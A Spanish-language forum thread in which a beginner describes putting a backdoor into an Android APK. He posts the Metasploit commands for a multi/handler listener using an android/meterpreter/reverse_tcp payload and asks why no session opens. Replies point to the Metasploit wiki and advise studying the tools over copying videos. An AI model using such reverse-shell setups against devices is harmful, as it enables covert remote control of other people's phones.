sus comentarios por favor soy novato....
Buenas gente, he aprendido a crear un backdoor y ponerlo en una apk pero por mucho que la ejecute en el otro dispositivo no consigo el control y se queda pillado en "started reverse tcp handler on (ip:puerto)
intento
EL CODIGO:
msfconsole
use multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.5.45
lhost =>192.168.5.45
msf exploit(multi/handler) > set lport 4444
lhost => 4444
Started reverse TCP handler on 192.168.5.45:4444
---------------------------------------------------------- aquí deja de funcionar.
estás seguro que se ejecutó y que esa es la ip del dispositivo?
esa es la ip de mi kali
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit (https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit)
Started reverse TCP handler on 192.168.5.45:4444
---------------------------------------------------------- aquí deja de funcionar.
igual seguí paso a paso.
Te recomendaría que estudies sobre payloads, fuzzers, scanners, etc.
Así vas a entender qué son y cómo funcionan, y una vez que entiendas esto, vas a encontrarle la lógica a la hora de configurarlos y ejecutarlos.
Con copy&paste de youtube te sirve para sentirte "hacker" en ese momento, pero a la hora de aplicarlo realmente en un entorno real te vas a ver en muchos mas problemas.
Dato aparte:
No cometas el error de querer aprenderte comandos de memoria, tampoco intentes aprender copiando de videos o manuales. Acordate que estas son guias que te quitan dudas para salir del paso. Pero no te resuelven el problema. Por ende para resolver algo, tenes que estudiar, interpretar, aprender, romperte la cabeza. Y así vas a lograr llegar a tus metas. Cuando lo hagas te vas a sentir muy feliz.
Incluso, por mas conocimientos que tengas, SIEMPRE existe una barrera que se te interpone en tu camino. Consejo sano. Un gran abrazo.